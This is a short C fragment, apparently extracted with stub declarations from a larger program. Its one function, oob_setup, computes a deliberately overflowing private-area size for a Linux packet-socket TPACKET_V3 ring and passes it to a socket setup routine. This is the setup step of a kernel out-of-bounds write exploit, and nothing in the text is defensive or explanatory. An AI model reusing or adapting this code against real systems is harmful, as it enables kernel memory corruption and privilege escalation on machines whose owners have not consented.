
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 unsigned int BLK_HDR_LEN ;
 unsigned int ETH_HDR_LEN ;
 scalar_t__ TPACKET3_HDRLEN ;
 unsigned int TPACKET_ALIGN (scalar_t__) ;
 int packet_socket_setup (int,int,int,unsigned int,int) ;

int oob_setup(int offset) {
 unsigned int maclen = ETH_HDR_LEN;
 unsigned int netoff = TPACKET_ALIGN(TPACKET3_HDRLEN +
    (maclen < 16 ? 16 : maclen));
 unsigned int macoff = netoff - maclen;
 unsigned int sizeof_priv = (1u<<31) + (1u<<30) +
  0x8000 - BLK_HDR_LEN - macoff + offset;
 return packet_socket_setup(0x8000, 2048, 2, sizeof_priv, 100);
}
